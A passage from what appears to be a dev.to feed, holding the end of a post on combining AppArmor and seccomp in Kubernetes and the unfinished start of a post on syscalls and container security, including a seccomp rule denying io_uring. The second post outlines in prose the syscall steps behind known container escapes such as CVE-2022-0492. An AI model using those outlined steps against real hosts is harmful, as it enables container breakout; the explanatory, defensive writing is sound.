&lt;p&gt;In modern Kubernetes platforms, AppArmor and seccomp are most valuable not as standalone controls, but as two layers in a deliberate architecture:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;What it restricts&lt;/th&gt;
&lt;th&gt;Enforcement point&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Seccomp&lt;/td&gt;
&lt;td&gt;Which syscalls the kernel will execute&lt;/td&gt;
&lt;td&gt;Before kernel entry (cBPF filter)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AppArmor&lt;/td&gt;
&lt;td&gt;What objects permitted syscalls can access&lt;/td&gt;
&lt;td&gt;LSM hooks during kernel execution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NetworkPolicy&lt;/td&gt;
&lt;td&gt;Where data can go&lt;/td&gt;
&lt;td&gt;iptables / eBPF dataplane&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Runtime detection&lt;/td&gt;
&lt;td&gt;When behavior deviates from baseline&lt;/td&gt;
&lt;td&gt;eBPF observability (Falco, Tetragon)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;No single control is sufficient. The platform architecture is the control — and these two layers together make the attack surface explicit, auditable, and enforceable at both the syscall invocation and object access levels.&lt;/p&gt;

&lt;p&gt;One framing worth keeping: Kubernetes doesn't implement these controls — it orchestrates them. &lt;code&gt;securityContext&lt;/code&gt;, &lt;code&gt;appArmorProfile&lt;/code&gt;, and &lt;code&gt;seccompProfile&lt;/code&gt; are instructions to the Linux kernel. The real enforcement always happens below the Kubernetes abstraction layer, in the kernel's syscall path. Understanding that boundary is what prevents "we have AppArmor configured" from being confused with "we have AppArmor enforcing what we think it is."&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Security is not about stacking controls — it's about understanding where each control stops.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  If You Remember Only One Thing Per Control
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Control&lt;/th&gt;
&lt;th&gt;What it does&lt;/th&gt;
&lt;th&gt;What it doesn't do&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Seccomp&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Reduces which syscalls the kernel will execute&lt;/td&gt;
&lt;td&gt;Cannot restrict what allowed syscalls operate on&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;AppArmor&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Reduces which objects processes can access&lt;/td&gt;
&lt;td&gt;Cannot block syscall invocation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Capabilities&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Reduces which privileged operations are allowed&lt;/td&gt;
&lt;td&gt;Neither path-aware nor syscall-surface aware&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;NetworkPolicy&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Restricts where data can go&lt;/td&gt;
&lt;td&gt;No visibility into process behavior&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Runtime detection&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Catches deviation from baseline behavior&lt;/td&gt;
&lt;td&gt;Detection, not prevention&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The table is also a checklist: if you can't articulate what each layer &lt;em&gt;doesn't&lt;/em&gt; cover, you're configuring controls, not designing a security posture.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Closing Thoughts
&lt;/h2&gt;

&lt;p&gt;The engineers who get this right aren't the ones who've read the most documentation. They're the ones who've been paged at 2am, watched a team disable AppArmor under pressure and never re-enable it, and learned the hard way that "we have security controls" and "we know what our security controls actually enforce" are different claims.&lt;/p&gt;

&lt;p&gt;AppArmor and seccomp are not hard to enable. They're hard to operate correctly over time — as applications change, nodes are replaced, sidecars are added, and profiles drift silently out of sync. The tooling exists to do this well: the Security Profiles Operator for lifecycle management, SPO's record mode for profile generation, SIEM integration for denial signals, and eBPF-based detection for the gaps neither control can fill.&lt;/p&gt;

&lt;p&gt;What separates a security posture from a compliance checkbox is whether you've thought through the failure modes — what happens when a profile is missing, when a runtime changes its defaults, when a team adds &lt;code&gt;Unconfined&lt;/code&gt; during an incident. That's the work. The YAML is the easy part.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;For a deeper understanding of the syscall mechanics that both controls rely on, see the companion post: &lt;a href="https://platformwale.blog/2026/03/18/syscalls-in-kubernetes-the-invisible-layer-that-runs-everything/" rel="noopener noreferrer"&gt;Syscalls in Kubernetes: The Invisible Layer That Runs Everything&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;p&gt;Originally Published at &lt;a href="https://platformwale.blog" rel="noopener noreferrer"&gt;https://platformwale.blog&lt;/a&gt;&lt;/p&gt;

</description>
      <category>kernel</category>
      <category>linux</category>
      <category>kubernetes</category>
      <category>infrastructure</category>
    </item>
    <item>
      <title>Syscalls in Kubernetes: The Invisible Layer That Runs Everything</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Thu, 19 Mar 2026 01:47:04 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/syscalls-in-kubernetes-the-invisible-layer-that-runs-everything-3f1p</link>
      <guid>https://dev.to/piyushjajoo/syscalls-in-kubernetes-the-invisible-layer-that-runs-everything-3f1p</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Every abstraction in Kubernetes — containers, namespaces, cgroups, networking — eventually collapses into a syscall. If you want to reason seriously about security, observability, and performance at the platform level, you need to understand what's happening at this layer.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;The Problem With "Containers Are Isolated"&lt;/li&gt;
&lt;li&gt;What Is a Syscall, Really?&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;io_uring&lt;/code&gt; Problem&lt;/li&gt;
&lt;li&gt;The CPU Privilege Model&lt;/li&gt;
&lt;li&gt;Anatomy of a Syscall&lt;/li&gt;
&lt;li&gt;How Containers Change the Equation&lt;/li&gt;
&lt;li&gt;
The Kubernetes Security Stack — Layer by Layer

&lt;ul&gt;
&lt;li&gt;seccomp: Your Syscall Firewall&lt;/li&gt;
&lt;li&gt;Falco: Syscall-Level Runtime Detection&lt;/li&gt;
&lt;li&gt;eBPF: Programmable Kernel Hooks&lt;/li&gt;
&lt;li&gt;gVisor: The User-Space Kernel&lt;/li&gt;
&lt;li&gt;LSMs: Mandatory Access Controls&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Real-World Scenarios&lt;/li&gt;
&lt;li&gt;Performance Implications&lt;/li&gt;
&lt;li&gt;What a Staff Engineer Should Own&lt;/li&gt;
&lt;li&gt;Further Reading&lt;/li&gt;
&lt;/ol&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Problem With "Containers Are Isolated"
&lt;/h2&gt;

&lt;p&gt;When engineers first learn Kubernetes, they're told: &lt;em&gt;containers are namespaced processes&lt;/em&gt;. And that's mostly true — namespaces isolate PIDs, mount points, and network interfaces; cgroups constrain CPU and memory. The abstraction holds well enough.&lt;/p&gt;

&lt;p&gt;Until it doesn't.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;In 2019, &lt;strong&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/cve-2019-5736" rel="noopener noreferrer"&gt;CVE-2019-5736&lt;/a&gt;&lt;/strong&gt; exploited a file-descriptor mishandling bug in &lt;code&gt;runc&lt;/code&gt;: a container process running as root could open &lt;code&gt;/proc/self/exe&lt;/code&gt;, which transparently resolves to the host's &lt;code&gt;runc&lt;/code&gt; binary via &lt;code&gt;procfs&lt;/code&gt; semantics — bypassing normal symlink sandboxing. The container could overwrite the &lt;code&gt;runc&lt;/code&gt; binary mid-execution and gain host root.&lt;/li&gt;
&lt;li&gt;In 2022, &lt;strong&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/cve-2022-0492" rel="noopener noreferrer"&gt;CVE-2022-0492&lt;/a&gt;&lt;/strong&gt; found a missing capability check in the kernel's &lt;code&gt;cgroup_release_agent_write&lt;/code&gt; function — a container without &lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt; in the host namespace could create a new user namespace via &lt;code&gt;unshare&lt;/code&gt;, mount cgroupfs inside it, and write an arbitrary path to &lt;code&gt;release_agent&lt;/code&gt;. When the cgroup emptied, the kernel executed that path as root on the host.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Both exploits were entirely syscall-driven — no memory corruption required. Crucially, both were &lt;em&gt;blocked by the Docker default seccomp profile and AppArmor&lt;/em&gt; — which is precisely why those defaults exist, and why disabling them on production workloads is so dangerous.&lt;/p&gt;

&lt;p&gt;The root cause in every container escape: &lt;strong&gt;containers share the host kernel&lt;/strong&gt;. And the kernel is reached exclusively through syscalls.&lt;/p&gt;

&lt;p&gt;If you're a platform or infrastructure engineer running multi-tenant Kubernetes, this isn't a security team problem. It's your problem. And it starts with understanding syscalls.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What Is a Syscall, Really?
&lt;/h2&gt;

&lt;p&gt;Your application — whether it's written in Go, Python, Java, or Rust — runs in &lt;strong&gt;user space&lt;/strong&gt;. It has no direct access to hardware, the filesystem, or the network. It cannot allocate physical memory. It cannot open a socket.&lt;/p&gt;

&lt;p&gt;To do any of these things, it must ask the kernel — and the only mechanism to do that is a &lt;strong&gt;system call (syscall)&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Think of it like this: your application is a tenant in an apartment building. The kernel is the building manager who controls access to electricity, water, and the internet. The syscall is the intercom — the only way to request something from the manager.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8hnduowad1uui7zqwrfn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8hnduowad1uui7zqwrfn.png" alt="image" width="729" height="1548"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Linux exposes roughly &lt;strong&gt;450 syscalls on x86-64&lt;/strong&gt; as of modern 6.x kernels (kernel 5.4 had ~435; kernel 6.1 reached ~450; 6.8+ ~460). The count grows with each release as new interfaces like &lt;code&gt;io_uring&lt;/code&gt; and &lt;code&gt;landlock&lt;/code&gt; are added. The most commonly used in a typical web application: &lt;code&gt;read&lt;/code&gt;, &lt;code&gt;write&lt;/code&gt;, &lt;code&gt;open&lt;/code&gt;, &lt;code&gt;close&lt;/code&gt;, &lt;code&gt;socket&lt;/code&gt;, &lt;code&gt;connect&lt;/code&gt;, &lt;code&gt;mmap&lt;/code&gt;, &lt;code&gt;clone&lt;/code&gt;, &lt;code&gt;execve&lt;/code&gt;, &lt;code&gt;exit&lt;/code&gt;. A typical containerized service uses fewer than 50 distinct syscalls in steady state.&lt;/p&gt;

&lt;p&gt;This matters enormously — because the ones you &lt;em&gt;don't&lt;/em&gt; need are your attack surface.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The &lt;code&gt;io_uring&lt;/code&gt; Problem
&lt;/h2&gt;

&lt;p&gt;Before getting into privilege rings and syscall mechanics, it's worth calling out the most significant shift in the Linux syscall surface of the past few years: &lt;strong&gt;&lt;code&gt;io_uring&lt;/code&gt;&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Introduced in Linux 5.1 (2019), &lt;code&gt;io_uring&lt;/code&gt; is an asynchronous I/O interface built around two ring buffers shared between user space and the kernel. The design goal was to eliminate the per-operation syscall overhead that makes high-throughput I/O expensive under KPTI(Kernel Page-Table Isolation). Instead of calling &lt;code&gt;read()&lt;/code&gt; or &lt;code&gt;write()&lt;/code&gt; per operation, applications submit batches of I/O requests by writing into the submission queue (SQ ring) and poll the completion queue (CQ ring) for results — all without a syscall per operation.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgii9sv4j7q97xd2v5bbx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgii9sv4j7q97xd2v5bbx.png" alt="image" width="800" height="159"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The performance gains are real — &lt;code&gt;io_uring&lt;/code&gt; can drive storage and network I/O at significantly higher throughput than traditional syscall-per-operation patterns. But it introduced a massive new kernel attack surface.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Security Problem
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;io_uring&lt;/code&gt; operations execute in the kernel with elevated context. Because the interface is complex, stateful, and relatively new, it has been a prolific source of privilege escalation vulnerabilities:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;CVE&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Impact&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2021-41073" rel="noopener noreferrer"&gt;CVE-2021-41073&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;2021&lt;/td&gt;
&lt;td&gt;Type confusion in &lt;code&gt;io_uring&lt;/code&gt; leading to privilege escalation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2022-29582" rel="noopener noreferrer"&gt;CVE-2022-29582&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;2022&lt;/td&gt;
&lt;td&gt;Use-after-free in &lt;code&gt;io_uring&lt;/code&gt; — container escape&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2023-2598" rel="noopener noreferrer"&gt;CVE-2023-2598&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;2023&lt;/td&gt;
&lt;td&gt;Heap out-of-bounds write via &lt;code&gt;io_uring&lt;/code&gt; fixed buffers&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Each of these was reachable from an unprivileged container process. Because &lt;code&gt;io_uring&lt;/code&gt; isn't a single syscall but a &lt;em&gt;kernel subsystem&lt;/em&gt; accessed via three syscalls (&lt;code&gt;io_uring_setup&lt;/code&gt;, &lt;code&gt;io_uring_enter&lt;/code&gt;, &lt;code&gt;io_uring_register&lt;/code&gt;), the standard seccomp &lt;code&gt;RuntimeDefault&lt;/code&gt; profile does &lt;strong&gt;not&lt;/strong&gt; block it — it was introduced after the default profiles were designed.&lt;/p&gt;

&lt;h3&gt;
  
  
  What To Do
&lt;/h3&gt;

&lt;p&gt;Many hardened environments explicitly block &lt;code&gt;io_uring&lt;/code&gt; at the seccomp level:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"syscalls"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"names"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"io_uring_setup"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"io_uring_enter"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"io_uring_register"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"action"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"SCMP_ACT_ERRNO"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Google's own gVisor&lt;/strong&gt; disables &lt;code&gt;io_uring&lt;/code&gt; by default. The Kubernetes &lt;code&gt;v1.33&lt;/code&gt; audit trail and several CIS benchmarks now explicitly recommend blocking &lt;code&gt;io_uring&lt;/code&gt; for workloads that don't require it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The staff-level takeaway:&lt;/strong&gt; every time the kernel adds a new high-performance I/O interface, it adds a new attack surface that existing seccomp profiles don't cover. &lt;code&gt;io_uring&lt;/code&gt; is the canonical example. Your seccomp profile graduation pipeline must account for new kernel subsystems, not just new individual syscalls.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The CPU Privilege Model
&lt;/h2&gt;

&lt;p&gt;To understand why syscalls exist, you need to understand how CPUs enforce privilege boundaries.&lt;/p&gt;

&lt;p&gt;Modern x86-64 processors have &lt;strong&gt;four privilege rings&lt;/strong&gt;:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9z05jfmz5moqtak6mdad.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9z05jfmz5moqtak6mdad.png" alt="image" width="800" height="417"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Linux only uses Ring 0 (kernel) and Ring 3 (user). When your application executes the &lt;code&gt;syscall&lt;/code&gt; instruction, the CPU immediately:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Saves the current register state&lt;/li&gt;
&lt;li&gt;Switches to kernel mode (Ring 0)&lt;/li&gt;
&lt;li&gt;Jumps to the kernel's syscall handler&lt;/li&gt;
&lt;li&gt;Executes the requested operation&lt;/li&gt;
&lt;li&gt;Restores registers and returns to Ring 3&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This mode switch is the &lt;em&gt;only&lt;/em&gt; sanctioned transition. Without it, user-space code cannot touch kernel data structures, physical memory, or hardware. It's a hardware-enforced boundary — not a software convention.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The critical insight for container security:&lt;/strong&gt; this boundary is per-kernel, not per-container. When two containers run on the same node, they use the same syscall gateway into the same kernel. A syscall that bypasses a kernel check escapes both containers simultaneously.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Anatomy of a Syscall
&lt;/h2&gt;

&lt;p&gt;Let's trace a concrete example. Suppose a Go HTTP server accepts a connection and reads the request body.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5fa3ksnpnkaqrmkb4ns8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5fa3ksnpnkaqrmkb4ns8.png" alt="image" width="800" height="369"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;What looks like a single &lt;code&gt;conn.Read()&lt;/code&gt; call results in:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;One or more &lt;code&gt;read(2)&lt;/code&gt; syscalls on the socket file descriptor&lt;/li&gt;
&lt;li&gt;The kernel checking the process's permissions, the socket state, and available data&lt;/li&gt;
&lt;li&gt;A DMA transfer from the NIC's ring buffer into kernel memory, then copied to user space&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Every one of those kernel checks is a potential security enforcement point — and every kernel bug in that path is a potential vulnerability reachable from your container.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  How Containers Change the Equation
&lt;/h2&gt;

&lt;p&gt;A VM gives each workload its own kernel. A container does not.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcgmemqiu8sirf2ohf4kh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcgmemqiu8sirf2ohf4kh.png" alt="image" width="800" height="106"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Containers get:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;PID namespace&lt;/strong&gt; — isolated process tree&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Network namespace&lt;/strong&gt; — isolated network stack&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Mount namespace&lt;/strong&gt; — isolated filesystem view&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;cgroups&lt;/strong&gt; — CPU/memory resource limits&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Containers do &lt;strong&gt;not&lt;/strong&gt; get:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Their own kernel&lt;/li&gt;
&lt;li&gt;Their own syscall table&lt;/li&gt;
&lt;li&gt;Kernel memory isolation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This does &lt;strong&gt;not&lt;/strong&gt; mean containers have zero isolation. Multiple mechanisms reduce the blast radius of a kernel compromise:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Namespaces&lt;/strong&gt; — restrict what a container can see (PIDs, mounts, network)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;cgroups&lt;/strong&gt; — bound resource consumption&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Linux Capabilities&lt;/strong&gt; — limit the privilege set a container process holds&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;seccomp&lt;/strong&gt; — restrict which syscalls can be made at all&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;LSMs (AppArmor/SELinux)&lt;/strong&gt; — enforce mandatory access controls even on permitted syscalls&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These work as &lt;strong&gt;defence-in-depth layers&lt;/strong&gt;, not as kernel isolation equivalents. A VM still provides a fundamentally stronger boundary because kernel bugs in one tenant cannot affect another tenant's kernel. But a well-configured container is far harder to escape than a bare process.&lt;/p&gt;

&lt;p&gt;This means if Container A can trigger a kernel bug via a syscall — say, a privilege escalation in &lt;code&gt;clone()&lt;/code&gt; or a heap overflow in &lt;code&gt;io_uring&lt;/code&gt; — it affects the host and every other container on that node.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Real scenario:&lt;/strong&gt; In 2022, &lt;a href="https://nvd.nist.gov/vuln/detail/cve-2022-0492" rel="noopener noreferrer"&gt;CVE-2022-0492&lt;/a&gt; found a missing capability check in the kernel's &lt;code&gt;cgroup_release_agent_write&lt;/code&gt; function. The kernel failed to verify that the calling process held &lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt; in the &lt;em&gt;initial&lt;/em&gt; user namespace. A container process could call &lt;code&gt;unshare()&lt;/code&gt; to create a new user namespace and cgroup namespace, mount cgroupfs inside it, then write an arbitrary host binary path to &lt;code&gt;release_agent&lt;/code&gt; — all without elevated host privileges. When the cgroup became empty, the kernel executed that binary as root on the host. Zero memory corruption: just &lt;code&gt;unshare()&lt;/code&gt;, &lt;code&gt;mount()&lt;/code&gt;, and &lt;code&gt;write()&lt;/code&gt; syscalls in the right sequence. &lt;strong&gt;Critically, containers running with the Docker default seccomp profile or AppArmor/SELinux were not vulnerable&lt;/strong&gt; — those layers blocked the required &lt;code&gt;mount()&lt;/code&gt; and &lt;code&gt;unshare()&lt;/code&gt; calls. Only permissive configurations (no seccomp, no MAC) were at risk.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Kubernetes Security Stack — Layer by Layer
&lt;/h2&gt;

&lt;p&gt;Given that containers share a kernel, how do you defend the syscall boundary? There are five complementary mechanisms — each operating at a different point in the syscall path:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhgsign4hiq9113z0z4v6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhgsign4hiq9113z0z4v6.png" alt="image" width="800" height="976"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  seccomp: Your Syscall Firewall
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://lwn.net/Articles/656307/" rel="noopener noreferrer"&gt;seccomp&lt;/a&gt;&lt;/strong&gt; (Secure Computing Mode) is a Linux kernel feature that lets you attach a BPF filter to a process. The filter is evaluated on every syscall &lt;em&gt;before&lt;/em&gt; the kernel executes it. When a syscall is not allowed, the filter's configured action determines the outcome — it is not always a simple &lt;code&gt;EPERM&lt;/code&gt;:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;seccomp Action&lt;/th&gt;
&lt;th&gt;Behaviour&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_ALLOW&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Syscall proceeds normally&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_ERRNO&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Returns an error code (e.g. &lt;code&gt;EPERM&lt;/code&gt;) — the default for RuntimeDefault&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_KILL_PROCESS&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Immediately kills the process — used for highest-risk syscalls&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_LOG&lt;/code&gt;&lt;/td&gt;
